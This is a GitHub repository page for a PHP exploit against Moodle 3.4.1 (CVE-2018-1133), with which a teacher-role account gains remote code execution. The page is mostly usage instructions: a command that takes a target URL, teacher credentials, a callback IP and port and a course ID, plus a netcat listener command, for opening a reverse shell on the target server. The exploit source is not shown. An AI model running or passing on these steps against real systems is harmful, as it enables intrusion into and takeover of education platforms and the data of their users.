Skip to content

darrynten/MoodleExploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 

Repository files navigation

Moodle Exploit

A user with the teacher role is able to execute arbitrary code.

Usage

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1

user       The account username
pass       The password to the account
ip         Callback IP
port       Callback Port
course     Valid course ID belonging to the teacher

Make sure you're running a netcat listener on the specified port before executing this script.

nc -lnvp 1010

This will attempt to open up a reverse shell to the listening IP and port.

Notes

This exploit is based on information provided by Robin Peraglie.

Additional Reading: https://blog.ripstech.com/2018/moodle-remote-code-execution

About

Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages